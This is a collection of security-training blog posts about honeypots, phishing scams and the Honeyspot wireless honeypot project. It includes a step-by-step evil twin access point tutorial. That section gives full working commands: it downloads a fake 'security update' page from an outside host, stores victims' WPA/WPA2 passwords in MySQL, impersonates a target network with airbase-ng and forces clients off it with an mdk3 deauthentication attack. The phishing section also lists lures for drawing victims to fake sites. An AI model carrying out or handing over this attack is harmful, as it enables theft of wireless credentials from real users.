How can we Define a Honeypot?

 

How can we define honeypots?

A honeypot is essentially a computer system. In this computer system, there exists files and directories just like any other usual computer system. A honeypot aims to attract an attacker to fall into its trap for it to investigate his actions and follow his behavior. In fact, a honeypot is not an actual system yet; it is a fake system. The difference between a honeypot and other security systems lies in the fact that a variety of security problems could be tackled at once using diverse approaches available on honeypots. On the contrary, other usual security systems are used to tackle one certain problem through a proposed solution. An instance of this point could be simply seen in the scenario when a compromised system could be investigated after having a log of malicious activity. At the same time, new threats could be recognized through implementing a honeypot in a network and hence attempt to tackle these problems and overcome them effectively.

 

Honeypots are indistinguishable from the actual production servers to an outside attacker. Thus, they will not behave any differently when attacking them. However, the network security team can monitor the honeypots for recorded attacks and later analyze them. The honeypots can also help to absorb attacks directed against the real server.

 

What is the motivation behind a honeypot?

The honeypot idea is mainly derived from a great interest in the field of computer security. The implementation of a honeypot requires that one is interested to know the workflow of security systems and to build a solid knowledge of how the protection of a company could be achieved and how security flaws in a system can be very risky for the entire system and organization. A network administrator shall be ready for great work ahead while implementing the honeypot system in a network. Being aware of the system and network architecture and the modifications that could be applied to them is a very crucial step beforehand. The output is examined through some reliable forensic science tools. In the meanwhile, several problems will be encountered, and the administrator has to make sure he can solve them before putting the honeypot in the system. Facing such problems beforehand will be very important for the administrator. This ensures that at a later time, although the conditions may be intense, the system will be handled quickly, and losses will be easily recovered. Therefore, good knowledge of examining security problems and forensic science information is a must.

 

What should be done before applying a honeypot to the real production system?

A network administrator should carry out some research by the time he thinks of applying the honeypot concept in the network. He has to be sure that the created honeypot is secured such that it has no leaks into the actual system. Otherwise, it will make a real disaster. On the other hand, he has to make sure that a hacker has no knowledge about being trapped into a honeypot. He has also to be aware of the maximum amount of information available for an attacker to get through the honeypot implementation. Also, it is good to know the behavior of an attacker when he knows that he is in a trap. Will that attacker just give up hacking and stop his actions? It is also really important for a network administrator to be knowledgeable of the location where the honeypot should be deployed in the network and the amount of information he can get.

Laws always play a role in everything in life. Therefore, it is also advisable that a network administrator should be aware of the restrictions applied on implementing honeypots; especially if his organization is in the European Union (EU) or the United State of America (USA). There are certain rules and regulations which govern the process of obtaining information of an attacker or tracking him back. Therefore, a network administrator should abide by these rules by not fully tracking the attacker, and at the same, he should be respectful of the laws in every single way.

What is the description of our problem?

 When we build a good honeypot, we expect to attract several attackers into the fake system and let them take control over the intentional flaws left in there. When we trace the hacker, it is not guaranteed for sure whether we will be the ones who have the control. Thus, we don’t know that much about the security of a honeypot. We are not sure whether the attacker, in fact, knows that it is a fake system. We also doubt whether the attacker is aware of the great importance of acquiring information about the system flaws. We need to be very specific and certain about the actual limits that an attacker has whenever he gets the control over the honeypot system. It will be disappointing if the attacker can even exploit the honeypot itself and seize a flaw in it to get to the system and do what he wants in the system. The entire system will be compromised when an attacker gets to this devastating point. Another entitled problem is that an attacker may recognize that it is a trap and then stop hacking or pretend that he is hacking. In that time, it is no longer beneficial to have the installed honeypot anymore, and it is not useful either to use our forensics tool to investigate the system. A very important aspect to consider when using honeypots is to be sure about the answers for all these questions and attempt to get our honeypots to be more secure and be assured that hacking the honeypot by the attacker will not yield any useful data for him about the actual system. A good network administrator should play the role of a hacker once and of a forensic examiner on another occasion or simultaneously do the same of course with his own team. Very accurate results could be acquired depending on various tools used for hacking and forensics.

Try Certified Ethical Hacker for FREE!!!https://infosecaddicts.com/course/certified-ethical-hacker-v10/

Resources:

http://www.diva-portal.org/smash/get/diva2:327476/fulltext01

https://www2.cs.arizona.edu/~collberg/Teaching/466-566/2012/Resources/presentations/2012/topic12-final/report.pdf

How can you Create an Evil Twin Access Point?

 

Quick intro to Evil Twin:

What is an evil twin access point? Basically, when it comes to security and especially Wi-Fi security, the name evil twin access point arises greatly. Basically, an attacker can imitate an actual Wi-Fi access point for the sake of getting to collect data from whoever attempts to access the network.

Installing a Wi-Fi access point with the same name and settings of another access point, and setting the access point and positioning it next to the impersonated one will most likely cause the victim user to fall in the trap. Since the two access points become twins, in fact, identical twins per say, the user will hardly be able to distinguish between the two access points and will try to access the evil access point as if it is the original one. This is because the signal strengths may be similar or even at times, the evil access point can be having the stronger signal.

Now, there are two cases: it is either the user’s device will connect automatically to an access point, which is in this case the evil access point, or the user will manually choose the stronger access point perceiving it as, the nearer one. In both cases, all the user’s sensitive data such as passwords will get intercepted by the attacker.

What do you need to set up an evil twin access point?

To be able to set up an evil twin access point, there are four main requirements:

  1. Have Kali Linux installed on your machine.
  2. Have a Wireless Network adapter.
  3. Have your machine connected to the Internet.
  4. Have a target access point.

What are the steps to accomplish the desired task?

The following steps work as a concise way to get an evil twin access point prepared for an attack:

  1. Get your Kali Linux machine opened and logged in
  2. Get the Internet connection established between your machine and the host machine.
  3. Get a DHCP server installed on your machine: this can be done by opening the terminal and typing: “apt-get install dhcp3-server “
  4. After the installation is done successfully, get the DHCP server configured with the following command:

“ nano/etc/dhcpd.conf”

A blank file should get opened into the terminal right away after executing this command.

  1. Inside the blank file, type the following, type the following lines as they are:

authoritative;

default-lease-time 600;

max-lease-time 7200;

subnet 192.168.1.128 netmask 255.255.255.128 {

option subnet-mask 255.255.255.128;

option broadcast-address 192.168.1.255;

option routers 192.168.1.129;

option domain-name-servers 8.8.8.8;

range 192.168.1.130 192.168.1.140;

}

  1. Save the file by pressing on ctrl+x and then press ‘y’
  2. You get to set the security update page downloaded; this page is the one which will appear when the user opens the browser. To be able to accomplish this task, you should change the directory to /var/www. You can simply type the following command for this sake:

“cd /var/www”

  1. Now that you changed the work directory, you get to type the following commands in their order:

rm index.html

wget http://hackthistv.com/eviltwin.zip

unzip eviltwin.zip

rm eviltwin.zip

  1. Get the apache server opened now and mysql as well. The following commands respectively should do this task for you:

/etc/init.d/apache2 start

/etc/init.d/mysql start

  1. Get a database created to be able to store the users’ WPA/WPA2 passwords when they enter the security update page. The following commands are very effective to do this task for you now:

mysql -u root

create database evil_twin;

use evil_twin

create table wpa_keys(password varchar(64), confirm varchar(64));

Don’t close the MySQL page or terminal after this step.

  1. Get to know the interface name of the local network adapter and know the local IP as well. To do that, get a new separate terminal opened and type the following commands inside it:

ip route

airmon-ng

airmon-ng start wlan0

clear

when you type the first command of this list: (take note of local IP n wired interface): the interface name is the one which appears after “eth0” and the local IP appears after “src”

  1. Type the following commands now:

airodump-ng-oui-update

airodump-ng -M mon0 (take note of the target essid,bssid and channel number which all appear after this command)

airbase-ng -e [ESSID] -c [ch. #] -P mon0 (such that [ESSID] is your target’s ESSID and [ch. #] is the target’s channel no which you took note of after the previous command)

  1. Now, the evil access point is awesomely running. However, we need to get to configure our tunnel interface to be able to create a bridge between our evil twin access point and the wired interface. The name of our tunnel interface is at0. This was essentially created when we used “airbase” in the last step. To make such configurations, get a new separate terminal opened without closing neither the MySQL nor the airbase terminals. The following command should be typed into the new terminal now:

ifconfig at0 192.168.1.129 netmask 255.255.255.128

  1. A routing table has to be added now such that IP forwarding gets enabled. This way, traffic can go into and from our evil access point successfully. The following commands should be typed respectively to get this task done:

route add -net 192.168.1.128 netmask 255.255.255.128 gw 192.168.1.129

echo 1 > /proc/sys/net/ipv4/ip_forward

iptables –table nat –append POSTROUTING –out-interface eth0 -j MASQUERADE

iptables –append FORWARD –in-interface at0 -j ACCEPT

iptables -t nat -A PREROUTING -p tcp –dport 80 -j DNAT –to-destination [LOCALIP ADDRESS:80]

iptables -t nat -A POSTROUTING -j MASQUERADE

dhcpd -cf /etc/dhcpd.conf -pf /var/run/dhcpd.pid at0

etc/init.d/iscdhcp-server start

  1. Perform a De-authentication attack now. This will make it compulsory for all the connected clients to connect to the evil twin access point. We need first of all to get a blacklist file created, to contain BSSID of the target. The following command will be doing this task for you:

echo [BSSID] > blacklist

NOTE:[BSSID] BSSID of the target

mdk3 mon0 d -b blacklist -c [CH.#]

  1. Get back to the airbase terminal; there you will know whether a user is connected to the evil twin access point. He will have entered his WPA/WPA2 password by then. To view this password, get back to the MySQL terminal and type the following commands:

use evil_twin

select * from wpa_keys; {To view the password entered by the victim in our MySQL database}

  1. Congratulations! You have created the evil twin access point successfully.

Try Certified Ethical Hacker for FREE!!!https://infosecaddicts.com/course/certified-ethical-hacker-v10/

Sources:

www.hacking-tutorial.com/hacking-tutorial/how-to-create-evil-twin-access-point/#sthash.rDbO247S.dpbs

How to understand phishing scams?

 

So, what about phishing scams?

Phishing is one of the most common social engineering attacks that has risen these days.

The following list provides some a few social engineering scams executed via phishing:

  1. Banking Link Scam:

Someone could easily send you an email to trick you to reveal some vital information about yourself. Even one may send a phony link to your bank to you such that you start to believe that your real bank sent it to you. Then, you will feel tempted to enter your user-name and password. In 2015, a campaign named Carbanak was able to get about around a billion dollars from over 30 countries. This information was found by Kaspersky. That is phishing.

What happened precisely is that spear phishing was highly depended on. As a result, workstations got infected through the help of their employees. Hackers were capable of tunneling more rooted into the bank’s systems, taking control over employee stations. This for sure allowed them to manage to transfer cash, to operate ATMs in a remote manner, get the information changed for different accounts, and do some other playful tricks on the reports.

The problem which occurred at that time was primarily due to a phishing email sent to some employees as if it was one of their colleagues who posted it. However, there was a malicious code right behind the scenes. It was able to spread from there widely. In the meantime, everything that happened on the victims’ machines was recorded by the attackers for future use. When proper time came, the attackers could understand everything in the system and get to know what things go where. This made it pretty easy for them when it came to doing several transactions among which was the ATM hits. In addition to that, inflating bank balances then siphoning off that amount was something on the scene such that an account balance for a customer might go from $20,000 to $100,000 and the $80,000 were the earnings of the hacker.

 

  1. Fax Notice Scam:

A phony link to a fake fax is all that it is. However, the damage is enormous when it occurs to your computer as a result. This type of scams appears significantly when it comes to dealing with companies that substantially rely on faxes. Firms that heavily utilize faxes are exemplified by document management firms, title companies, and other companies for insurance and other financial services.

 

  1. Dropbox Link Scam:

Even Dropbox has its surprises with regards to scams. Some security incidents occurred through the year 2014. In one of the cases, what happened is that there was a phishing email sent to victims, asking them to click on a fake link to reset their Dropbox password. After clicking the link, it led the users into a page. There, they faced a warning from the browser saying that their browser is out of date and they need to update it. There was a button where users needed to press to run their update. However, this was the trigger for a Trojan in the Zeus family of malware. Additionally, there was another phishing attack that used Dropbox. Emails were sent to victims having some Dropbox links. On clicking on such links, malicious software like “CryptoWall” ransomware got into the systems.

 

  1. Court Secretary Complaint Link Scam:

This is another phony link which hackers use to trick a customer who falls as a victim of phishing. It is a link that confirms a customer’s complaint. For instance, a phishing email of that sort may include a kind of prediction that a consumer is willing to complain about something very soon. The one who sends the email attempts to grasp the problems that the customer has to further work on them. Using this kind of phishing was in fact very common for quite some time.

 

  1. Facebook Message Link Scam:

This type of phishing trick mainly appears at the time of death time of a celebrity. A link is sent through Messenger or shared through different pages that daisies will be pushed up from the computer through a click on the proposed link.

One vivid example of this occurred when Robin Williams died. Unfortunately, a phishing message through Facebook was hugely widespread among different users tempting them to open a link to watch the Robin Williams goodbye video. The phishing message was really to the point such that even they added more flavor to the title of the link to indicate that it is an exclusive video of Williams saying goodbye through his cell phone. When the user clicked the link, the link drove them into a bogus BBC website page which had nothing but some bad links leading to scam online surveys.

How is it possible for an attacker to attract more victims to the counterfeit website?

There are in fact many methods which an attacker utilizes to get more victims to visit the fake website. Among these methods, the following four tricky methods exist:

  1. The attacker shortens the phishing website to the minimum appropriate length.
  2. The URL gets several shares on social media websites such as WhatsApp and Viber. It is more likely that people will have the incentive to get through these phishing links there because there is no shared awareness of computer security among the users of these social groups.
  3. Many use mostly social engineering here such that people will fall into the trap and open the links.
  4. URLs are sent by the attackers to the victims through emails especially from female names.

Try Certified Ethical Hacker for FREE!!!https://infosecaddicts.com/course/certified-ethical-hacker-v10/

Sources

https://digitalguardian.com/blog/social-engineering-attacks-common-techniques-how-prevent-attack

Hacking GMail Using Phishing Method and Prevention

What is Honeyspot?

 

What are Wireless Honeypots?

There are different types of honeypot system that are commonly used as well. They are called wireless honeypots. Getting a wireless honeypot deployed in a network is mainly used for the sake of capturing the behavior of a system which resides inside a wireless network. Information and statistics about such behavior and activities could be easily gathered from such honeypots. Wireless connections contain both the technology of IEEE 802.11 and some other similar technologies like Bluetooth for instance.

Why do we use Wi-Fi honeypots?

We are basically into using Wi-Fi honeypots to track any malicious activity on the target network. To elaborate more, using some access points, a wired network, and some open-to-attack computers could simply lead to obtaining a Wi-Fi structure, right? In this structure, Wi-Fi networks are really vulnerable to enormous amounts of attacks, which urges the need for a Wi-Fi honeypot that could simply be capable of getting any unauthorized traffic captured and getting some questions answered about the possibility of catching wardriving and hackers which are collecting their forces to attack a wireless network and get it compromised.

 

What is Honeyspot? 

Honeyspot is, in fact, the name of a wireless honeypot project which got the original support from Honeynet, the Spanish project. This project is in fact considered to be the most famous honeypot projects when it comes to wireless honeypots. The reason why it has this strange name lays back in the two terms Honeypot, which is the basic idea of wireless honeypots, and hotspot, which is the basic idea of a wireless network.

The rationale beyond this honeyspot project is basically to monitor an attacker while he tries to act maliciously against a wireless network to know his behavior and actions. The traffic going through such honeyspot is only the malicious traffic. On the other hand, since any professional and experienced attacker is capable of identifying whether it is, in fact, a real system or it is a fake honeypot, it is no different when it comes to honeyspot project where same experienced attackers could recognize and distinguish between honeyspot and real systems. The way in which a honeyspot appears matter to convince the majority of attackers that it is a real system. There should be many similarities between the real system and a honeyspot system.

The aim that the team of the honeyspot project had in mind is that they needed to understand attack types, ideas that an intruder has about the system, his logic, and how he approaches the system for his purposes. The benefit of getting much information about the attack is huge such that attack should be completely identified to further prevent any similar attacks in the future. Using this collected information and data about the attack, it becomes easy to understand many flaws that WEP wireless connections have, and for sure how attackers think about that and how they try to exploit such vulnerabilities. All of the IP address spoofing, hacking of web session, and spoofing of a MAC address become all recognized and identified using Honeyspot project. Special approaches to get the clients of a wireless network hacked are also understandable with the help of the Honeyspot project. The result of all of this information and understandings, the existence of much more secured systems become achievable.

There is, in fact, a special network architecture that works best with the Honeyspot project.

The architecture consists of the following components:

  1. There has to be a Wi-Fi access point (WAP) to which clients can have access to and connect to it. An attacker is also able to connect to the WAP. This is the main source of internet connection for all its clients.
  2. There are on the other hand the wireless clients (WC) who seems to be utilizers of the network in the first place to gain access to the internet connection provided using WAP. However, all of these clients are not actual devices, and they can connect to the honeyspot network. If these clients are not real, then why on earth we have them in the first place? The basic answer to this question is that we mainly need to create traffic in the fake system. We want to show the attacker that there is traffic going through the wireless honeyspot as incoming and outcoming traffic. This gives the attacker a sense that he is attacking a real system, not a fake one. Consequently, he becomes tempted to attack the network through initially monitoring such traffic with the use of his monitoring tools used for the attack.
  3. There is also what is referred to as WMON which is a wireless monitor module. In this module, traffic gets captured such that any information about the network traffic could be retrieved and monitored. This assists security administrators in getting to understand the attacks and get information about it. This shows how important this module is.
  4. Another module exists, having the name of WDA which refers to wireless data analysis module. The work of this module mainly depends on the work of WMON in the first place. This module takes part with the administrators in the process of getting to analyze the captured traffic. Now you can see why this module relies heavily on the WMON module. While capturing data happens by WMON module, WDA comes to analyze and examine this traffic. The mechanism goes like the following: when WMON captures the records of traffic, it saves them and then sends them directly to WDA to make sense of this traffic through analyzing it to get important information from it.
  5. Finally, the last module is named WI module. This module is, in fact, a wired structure which is optional in the architecture used for honeyspot, meaning that it could exist or not in the architecture without having to worry about any problems. The idea is basically that this network structure may be designed to have a wired connection structure as well as the wireless connection. This just gives a slightly different aspect to the usual network structure used for honeyspot.

Try Certified Ethical Hacker for FREE!!!https://infosecaddicts.com/course/certified-ethical-hacker-v10/

Resources:

http://www.diva-portal.org/smash/get/diva2:327476/fulltext01

https://www2.cs.arizona.edu/~collberg/Teaching/466-566/2012/Resources/presentations/2012/topic12-final/report.pdf